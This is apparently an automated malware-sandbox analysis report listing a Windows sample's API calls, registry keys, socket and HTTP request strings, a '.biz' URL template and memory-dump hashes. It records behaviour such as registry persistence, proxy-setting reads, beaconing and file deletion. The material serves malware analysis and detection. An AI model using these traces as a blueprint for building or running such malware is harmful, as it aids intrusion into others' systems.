                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                      • API String ID: 1870287861-1479823086
                                                                                                                                                                      • Opcode ID: fff2187d9395344ec5cb8b4e6fa5237caed246dd2aa0f7c7d8a8eac4725eeaf5
                                                                                                                                                                      • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                      • Opcode Fuzzy Hash: fff2187d9395344ec5cb8b4e6fa5237caed246dd2aa0f7c7d8a8eac4725eeaf5
                                                                                                                                                                      • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                      • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                      • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                      • API String ID: 104937078-1479823086
                                                                                                                                                                      • Opcode ID: efe5243ce687c9314706695e1d39894db8fde8d7e5978220c2e4c14ce612887e
                                                                                                                                                                      • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                      • Opcode Fuzzy Hash: efe5243ce687c9314706695e1d39894db8fde8d7e5978220c2e4c14ce612887e
                                                                                                                                                                      • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                      • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                      • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,HTTP/1.0 200), ref: 00402206
                                                                                                                                                                      Strings
                                                                                                                                                                      • GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00402183
                                                                                                                                                                      • HTTP/1.0 200, xrefs: 00402200
                                                                                                                                                                      • 0, xrefs: 004021EF
                                                                                                                                                                      • Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00402297
                                                                                                                                                                      • GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 0040217C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: closesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                      • String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                      • API String ID: 2963668025-182194581
                                                                                                                                                                      • Opcode ID: c282304cf60fc3480ce665dca798d39c0619161053833bff8b6258c82078b0f8
                                                                                                                                                                      • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                      • Opcode Fuzzy Hash: c282304cf60fc3480ce665dca798d39c0619161053833bff8b6258c82078b0f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue$Close
                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$ShellRegEx
                                                                                                                                                                      • API String ID: 2529929805-3421572904
                                                                                                                                                                      • Opcode ID: dc52c7e1831737a58588ce9ac5976d6c25a0bebbd806c3934b882d2e8e89e164
                                                                                                                                                                      • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                      • Opcode Fuzzy Hash: dc52c7e1831737a58588ce9ac5976d6c25a0bebbd806c3934b882d2e8e89e164
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                      • String ID: --k33p
                                                                                                                                                                      • API String ID: 881816827-1573217081
                                                                                                                                                                      • Opcode ID: cba08d0e4e45f01dd6ace973ea33b7b63a207b7531e35ce1b4a5f54abbb5a40a
                                                                                                                                                                      • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                      • Opcode Fuzzy Hash: cba08d0e4e45f01dd6ace973ea33b7b63a207b7531e35ce1b4a5f54abbb5a40a
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                      APIs
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1886816560-0
                                                                                                                                                                      • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                      • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                      • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                      • API String ID: 4202809218-4073750446
                                                                                                                                                                      • Opcode ID: 742482acffc0848fc44af7d2014056961fa9e3056a27fe89fc2a08a5173c9334
                                                                                                                                                                      • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                      • Opcode Fuzzy Hash: 742482acffc0848fc44af7d2014056961fa9e3056a27fe89fc2a08a5173c9334
                                                                                                                                                                      • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                      • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                      • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                      • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv$select
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 873784944-0
                                                                                                                                                                      • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                      • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411009,00000004,?,00405F35), ref: 00401D25
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: cb3a058cf70e81167843520c46fb0466aa5eec9e791d9ce5bf6ab9d735437fae
                                                                                                                                                                      • Instruction ID: 52816088567a2a1d922fdabb556b33062536571a2cef852fce66200631c346e0
                                                                                                                                                                      • Opcode Fuzzy Hash: cb3a058cf70e81167843520c46fb0466aa5eec9e791d9ce5bf6ab9d735437fae
                                                                                                                                                                      • Instruction Fuzzy Hash: 36F0E9B174030417F7305518EC81B7B7799EFD436AF10503AFB09967D0E1795C5986AE
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,0040228C), ref: 00401720
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 00401751
                                                                                                                                                                      • lstrcatA.KERNEL32(?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 0040177F
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000003,00000000,00000000,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings,?,?,?,?,?,?,?,00001000,00000000,?), ref: 00401795
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ProxyEnable,00000000,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004017D2
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,Connections,00000000,00020019,?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 00401817
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,00001000), ref: 0040189E
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004018BD
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00020019,?,\Software\Microsoft\Windows\CurrentVersion\Internet Settings), ref: 004018CF
                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(80000003,?,?,00001000), ref: 004018E8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00001000,00000000,?,00000000,?,?,0040228C), ref: 004018FF
                                                                                                                                                                      Strings
                                                                                                                                                                      • ProxyEnable, xrefs: 004017C6
                                                                                                                                                                      • Connections, xrefs: 0040180B
                                                                                                                                                                      • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00401779
                                                                                                                                                                      • _Classes, xrefs: 00401762
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 00401716
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$EnumOpenValue$CreateQuerylstrcatlstrlen
                                                                                                                                                                      • String ID: Connections$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes
                                                                                                                                                                      • API String ID: 1447802672-1466506419
                                                                                                                                                                      • Opcode ID: d3295ec940f29848c904df78408c3b96a88a7e9fbd20fa56bea7fd4937e4880a
                                                                                                                                                                      • Instruction ID: 66e194334fdec41dc41c183a83ee0e0423d2cbbda799cea80f6bf4481fa86f55
                                                                                                                                                                      • Opcode Fuzzy Hash: d3295ec940f29848c904df78408c3b96a88a7e9fbd20fa56bea7fd4937e4880a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941EEB2904344AAF73176219C0AF9B7B9C9B44348F14443FFE88B51D3E279962CC667
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004049C8,?,00000100,?,?,00000104), ref: 00401549
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000100,?,?,00000104), ref: 0040156D
                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00401588
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00001000,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004015F1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401601
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00401607
                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 0040160D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandle$AttributesDeleteRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3513576528-0
                                                                                                                                                                      • Opcode ID: 41ed5e2b111f1504c4f2cfafdd4510ffd4951226a2c659f90d2f2fbe674caf25
                                                                                                                                                                      • Instruction ID: ead9107263b76718dec6335517b8b67c7343bef8d8983c19364d90e74fa0285a
                                                                                                                                                                      • Opcode Fuzzy Hash: 41ed5e2b111f1504c4f2cfafdd4510ffd4951226a2c659f90d2f2fbe674caf25
                                                                                                                                                                      • Instruction Fuzzy Hash: 8021A1B1A802007AE53031757C03F5B369C8B84758F190A3BFE06B91D6F5BDE62941AF
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wsprintf$lstrcpylstrlen
                                                                                                                                                                      • String ID: %02X$http://%s.biz/d/G?$p!A
                                                                                                                                                                      • API String ID: 1876335253-3368850760
                                                                                                                                                                      • Opcode ID: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction ID: 2cea46374afef77fdc915a1e9f7db235c3865f046913e12eac0c1d1ce8585de9
                                                                                                                                                                      • Opcode Fuzzy Hash: cb09279badd15ee99111056726957111c3d85b17a551844977e1177323dfd80f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F410331C002189BDB11EF68CD8979EBBF5BF40308F150176E815BB2D2D3B9A919C799
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003), ref: 00403526
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,?,00000012), ref: 00403543
                                                                                                                                                                      • Sleep.KERNEL32(00001388,00000012), ref: 00403550
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.4775562741.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.4775474778.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775622779.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775681293.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.4775748072.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$Sleep
                                                                                                                                                                      • String ID: Default Flags
                                                                                                                                                                      • API String ID: 3593280086-1793642065
                                                                                                                                                                      • Opcode ID: 21d0f87f3dbcf3fc67c84d5afca7e09b8c8d69fca2a39a5828c1e487fc111c3c
                                                                                                                                                                      • Instruction ID: c183a8bf8b1eb437f9bd20ceed0a90573d3401291b8ece137b7e57e0eade4e67
                                                                                                                                                                      • Opcode Fuzzy Hash: 21d0f87f3dbcf3fc67c84d5afca7e09b8c8d69fca2a39a5828c1e487fc111c3c
                                                                                                                                                                      • Instruction Fuzzy Hash: 68E04F71A8030472D7712639AE4BF477A3467A1B09F11007BB906398C7A5B51329D9AA
                                                                                                                                                                      APIs
                                                                                                                                                                      • wsprintfA.USER32 ref: 004024A3
                                                                                                                                                                        • Part of subcall function 00402030: lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                        • Part of subcall function 00402030: lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                        • Part of subcall function 00402030: htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                        • Part of subcall function 00402030: socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                        • Part of subcall function 00402030: closesocket.WS2_32(00000000), ref: 00402169
